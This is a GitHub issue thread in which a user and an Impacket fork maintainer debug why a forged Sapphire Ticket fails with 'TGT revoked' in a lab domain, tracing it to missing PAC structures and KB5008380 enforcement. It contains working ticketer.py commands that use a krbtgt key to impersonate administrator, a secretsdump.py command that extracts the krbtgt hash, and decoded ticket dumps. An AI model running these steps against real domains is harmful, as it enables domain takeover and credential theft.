Cyb3rGh0st786
commented
1 year ago @ShutdownRepo FYI
Closed Cyb3rGh0st786 closed 1 year ago
Cyb3rGh0st786
commented
1 year ago @ShutdownRepo FYI
ShutdownRepo
commented
1 year ago The PAC_ATTRIBUTES_INFO and PAC_REQUESTOR_INFO structures seem to be missing from your ticket, it's probably the cause of you error, as per https://github.com/fortra/impacket/issues/1390 and https://github.com/fortra/impacket/pull/1545
But the changes have been merged, I don't why you don't have those new structures in your PAC
If you're able to obtain a ticket for normaldomainuser and describe it and see if the structures are in his ticket it'd be awesome
Cyb3rGh0st786
commented
1 year ago @ShutdownRepo ,
Here is what I have done and userone is my normal domain user account, and I have tried to impersonate this user
ticketer.py -request -impersonate 'userone' -domain 'adlab.com' -user 'userone' -password 'mypassword' -aesKey 'mykrbtgtaeskey' -domain-sid 'S-1-5-21-991381806-4095455566-2546632930' -dc-ip 192.168.126.200 'userone' -debug
describeTicket.py ./userone.ccache -u "userone" --aes "krbtgtaeskey" -d adlab.com
Impacket for Exegol - v0.10.1.dev1+20230828.161954.3f48a55e - Copyright 2022 Fortra - forked by ThePorgs
[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key : 665274625a666351596166594e5375694c666a766e76724958464466786e5377
[*] User Name : userone
[*] User Realm : ADLAB.COM
[*] Service Name : krbtgt/ADLAB.COM
[*] Service Realm : ADLAB.COM
[*] Start Time : 06/09/2023 15:28:57 PM
[*] End Time : 07/09/2023 01:28:57 AM
[*] RenewTill : 07/09/2023 15:28:57 PM
[*] Flags : (0x50e50000) forwardable, proxiable, renewable, initial, pre_authent, ok_as_delegate, enc_pa_rep
[*] KeyType : aes256_cts_hmac_sha1_96
[*] Base64(key) : ZlJ0YlpmY1FZYWZZTlN1aUxmanZudnJJWEZEZnhuU3c=
[*] Decoding unencrypted data in credential[0]['ticket']:
[*] Service Name : krbtgt/adlab.com
[*] Service Realm : ADLAB.COM
[*] Encryption type : aes256_cts_hmac_sha1_96 (etype 18)
[*] Decoding credential[0]['ticket']['enc-part']:
[*] LoginInfo
[*] Logon Time : 06/09/2023 11:28:57 AM
[*] Logoff Time : Infinity (absolute time)
[*] Kickoff Time : Infinity (absolute time)
[*] Password Last Set : 10/04/2023 04:10:22 AM
[*] Password Can Change : 11/04/2023 04:10:22 AM
[*] Password Must Change : Infinity (absolute time)
[*] LastSuccessfulILogon : Infinity (absolute time)
[*] LastFailedILogon : Infinity (absolute time)
[*] FailedILogonCount : 0
[*] Account Name : userone
[*] Full Name : user one
[*] Logon Script :
[*] Profile Path :
[*] Home Dir :
[*] Dir Drive :
[*] Logon Count : 426
[*] Bad Password Count : 0
[*] User RID : 1103
[*] Group RID : 513
[*] Group Count : 1
[*] Groups : 513
[*] Groups (decoded) : (513) Domain Users
[*] User Flags : (32) LOGON_EXTRA_SIDS
[*] User Session Key : 00000000000000000000000000000000
[*] Logon Server : WIN-3MBDJTT1P21
[*] Logon Domain Name : ADLAB
[*] Logon Domain SID : S-1-5-21-991381806-4095455566-2546632930
[*] User Account Control : (8720) USER_NORMAL_ACCOUNT, USER_DONT_EXPIRE_PASSWORD, USER_TRUSTED_FOR_DELEGATION
[*] Extra SID Count : 1
[*] Extra SIDs : S-1-18-2 Service asserted identity (SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED)
[*] Resource Group Domain SID :
[*] Resource Group Count : 0
[*] Resource Group Ids :
[*] LMKey : 0000000000000000
[*] SubAuthStatus : 0
[*] Reserved3 : 0
[*] ClientName
[*] Client Id : 06/09/2023 11:28:57 AM
[*] Client Name : userone
[*] UpnDns
[*] Flags : (2) S_SidSamSupplied
[*] UPN : userone@adlab.com
[*] DNS Domain Name : ADLAB.COM
[*] SamAccountName : userone
[*] UserSid : S-1-5-21-991381806-4095455566-2546632930-1103
[*] ServerChecksum
[*] Signature Type : hmac_sha1_96_aes256
[*] Signature : 323030dcfb8e1b872bc06989
[*] KDCChecksum
[*] Signature Type : hmac_sha1_96_aes256
[*] Signature : f6da234e225e7febd9b55788Please let me know if you need any further details and testing
ShutdownRepo
commented
1 year ago I'd need the regular TGT for userone
Something you'd get with getTGT
Cyb3rGh0st786
commented
1 year ago @ShutdownRepo ,
Here you go
Impacket for Exegol - v0.10.1.dev1+20230828.161954.3f48a55e - Copyright 2022 Fortra - forked by ThePorgs
[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key : ec72f38ed852119ac094cc0a33190dcfe7a0d1e709a97b6b5e5f70a3e7aad346
[*] User Name : userone
[*] User Realm : ADLAB.COM
[*] Service Name : krbtgt/adlab.com
[*] Service Realm : ADLAB.COM
[*] Start Time : 06/09/2023 21:40:31 PM
[*] End Time : 07/09/2023 07:40:31 AM
[*] RenewTill : 07/09/2023 21:40:32 PM
[*] Flags : (0x50e10000) forwardable, proxiable, renewable, initial, pre_authent, enc_pa_rep
[*] KeyType : aes256_cts_hmac_sha1_96
[*] Base64(key) : 7HLzjthSEZrAlMwKMxkNz+eg0ecJqXtrXl9wo+eq00Y=
[*] Decoding unencrypted data in credential[0]['ticket']:
[*] Service Name : krbtgt/adlab.com
[*] Service Realm : ADLAB.COM
[*] Encryption type : aes256_cts_hmac_sha1_96 (etype 18)
[*] Decoding credential[0]['ticket']['enc-part']:
[*] LoginInfo
[*] Logon Time : 06/09/2023 17:36:37 PM
[*] Logoff Time : Infinity (absolute time)
[*] Kickoff Time : Infinity (absolute time)
[*] Password Last Set : 06/09/2023 17:40:02 PM
[*] Password Can Change : 07/09/2023 17:40:02 PM
[*] Password Must Change : Infinity (absolute time)
[*] LastSuccessfulILogon : Infinity (absolute time)
[*] LastFailedILogon : Infinity (absolute time)
[*] FailedILogonCount : 0
[*] Account Name : userone
[*] Full Name : user one
[*] Logon Script :
[*] Profile Path :
[*] Home Dir :
[*] Dir Drive :
[*] Logon Count : 428
[*] Bad Password Count : 1
[*] User RID : 1103
[*] Group RID : 513
[*] Group Count : 1
[*] Groups : 513
[*] Groups (decoded) : (513) Domain Users
[*] User Flags : (32) LOGON_EXTRA_SIDS
[*] User Session Key : 00000000000000000000000000000000
[*] Logon Server : WIN-3MBDJTT1P21
[*] Logon Domain Name : ADLAB
[*] Logon Domain SID : S-1-5-21-991381806-4095455566-2546632930
[*] User Account Control : (8720) USER_NORMAL_ACCOUNT, USER_DONT_EXPIRE_PASSWORD, USER_TRUSTED_FOR_DELEGATION
[*] Extra SID Count : 1
[*] Extra SIDs : S-1-18-1 Authentication authority asserted identity (SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED)
[*] Resource Group Domain SID :
[*] Resource Group Count : 0
[*] Resource Group Ids :
[*] LMKey : 0000000000000000
[*] SubAuthStatus : 0
[*] Reserved3 : 0
[*] ServerChecksum
[*] Signature Type : hmac_sha1_96_aes256
[*] Signature : 493b020c12ca0ee59a8ca947
[*] KDCChecksum
[*] Signature Type : hmac_sha1_96_aes256
[*] Signature : 06a9f66bc1ec98cfc43d1f4e
[*] ClientName
[*] Client Id : 06/09/2023 17:40:31 PM
[*] Client Name : userone
[*] UpnDns
[*] Flags : (2) S_SidSamSupplied
[*] UPN : userone@adlab.com
[*] DNS Domain Name : ADLAB.COM
[*] SamAccountName : userone
[*] UserSid : S-1-5-21-991381806-4095455566-2546632930-1103
[*] Attributes Info
[*] Flags : (1) PAC_WAS_REQUESTED
[*] Requestor Info
[*] UserSid : S-1-5-21-991381806-4095455566-2546632930-1103userone.ccache.zip I added the ccache file also which I got it from gettgt for your reference. Remove the .zip extension
ShutdownRepo
commented
1 year ago that's what I thought, structures PAC_ATTRIBUTES_INFO and PAC_REQUESTOR are in the original userone's TGT and are not in the ticket produced with ticketer for some reason, which indicates that the issue is probably located around here
https://github.com/fortra/impacket/blob/d7b5e3704e090ed90c4ef8e038bdd5642b65e4f5/examples/ticketer.py#L652-L662
I won't be able to debug that just yet, would you be able to try debugging and find out where's the wrong happening?
Cyb3rGh0st786
commented
1 year ago Sure, I will give it a try
ShutdownRepo
commented
1 year ago So, from the tests we made together with @kaleemshaik7867 today, what's happening is Sapphire Ticket takes an initial ticket's PAC and "copies" it into a new one. The initial ticket is obtained through S4U2self + U2U.
This initial PAC is missing the two PAC blobs PAC_ATTRIBUTES_INFO and PAC_REQUESTOR, that's why they are missing from the final ticket.
If we obtain the initial ticket manually (getTGT user1, getST -u2u -self -impersonate user2) the result is the same.
Nota bene: the user1's TGT is not missing the two structures, meaning the structures go missing in the getST process.
This means that there is either an issue in how the ticket is requested through getST with S4U2self+U2U (a flag missing for instance, or anything that tells the DCs not to include the news structures), or there is a problem with the environment (the DC fails to produce a service ticket with the new structures, which is unlikely).
Next step: understand what's wrong with the ST request
ShutdownRepo
commented
1 year ago Additional testing indicates that the structures go missing after a regular ST request with getST.py, so if something's wrong with getST.py, it's not only with S4U2self + U2U. Maybe those structures are meant to go away in a service ticket, which I don't think is the reason because afaik, a TGT's PAC is copy-pasted in a service ticket when a user asks for an ST 🤷
ShutdownRepo
commented
1 year ago This issue can be closed. I figured it out and pushed fixes. Enforced KB5008380 was the root cause.
Cyb3rGh0st786
commented
1 year ago Thank you, @ShutdownRepo, for your exceptional support in closing the issue.
ShutdownRepo
commented
1 year ago Glad we sorted it out, thank you for the great help
Configuration
impacket version: 0.10.1.dev1+20230828.161954.3f48a55e Python version: 3.11.4 Target OS: Kali Linux
I tried to create a sapphire ticket using ticketer.py. The ccache file has been created, but when I try to use it with wmiexec.py or secretsdump.py, I get an error saying TGT revoked
Tickerter Command
ticketer.py -request -impersonate 'administrator' -domain 'adlab.com' -user 'normaldomainuser' -mypassword' -aesKey 'Krgtgtaeskey' -domain-sid 'S-1-5-21-991381806-4095455566-2546632930' -dc-ip 192.168.126.200 'administrator' -debugDebug info attached
Debug info.txt
Export the cache file
export KRB5CCNAME=~/Desktop/tools/impacket-theporgs/administrator.ccacheSecretsdumpy
secretsdump.py adlab.com/administrator@192.168.126.200 -dc-ip 192.168.126.200 -just-dc-user krbtgt -k -no-pass -debugDescribe the ticket